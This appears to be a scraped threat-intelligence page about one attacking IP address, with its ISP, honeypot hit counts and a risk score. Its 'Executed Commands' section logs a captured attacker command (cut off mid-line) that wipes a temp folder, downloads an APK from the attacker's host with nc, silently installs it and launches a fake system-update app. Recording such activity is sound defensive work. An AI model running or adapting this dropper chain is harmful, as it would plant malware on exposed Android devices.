Active Threat β’ HIGH
87.120.191.67
Country of OriginπΊπΈ United States
First Detection2/11/2026
Last Activity2/23/2026
ISPVpsvault.host Ltd
π―
1611
Total Attacks
π
4
Ports
π‘
4
Attack Types
π¦
0
Malware
Geolocation
- Country
- πΊπΈ United States
- City
- Unknown
- ASN
- AS215925
- ISP
- Vpsvault.host Ltd
Attack Types
h0neytr4p
honeyaml
adbhoney
tanner
Attacked Ports
8044330005555
Associated Malware
No associated malware
Executed Commands
$
cd /data/local/tmp; cd /data/local/tmp && rm -f *; (toybox nc 87.120.191.67 64141 || busybox nc 87.120.191.67 64141) > app.apk; sleep 3; [ -s app.apk ] && ls -lh app.apk && (pm install -r /data/local/tmp/app.apk || pm install -t -r /data/local/tmp/app.apk || pm install -g -r /data/local/tmp/app.apk || cmd package install -r /data/local/tmp/app.apk || cmd package install -t -r /data/local/tmp/app.apk) && (am start -n com.system.update/.MainActivity || am start-foreground-service -n com.system.upd2xRisk Assessment
65
/100
LowMediumHighCritical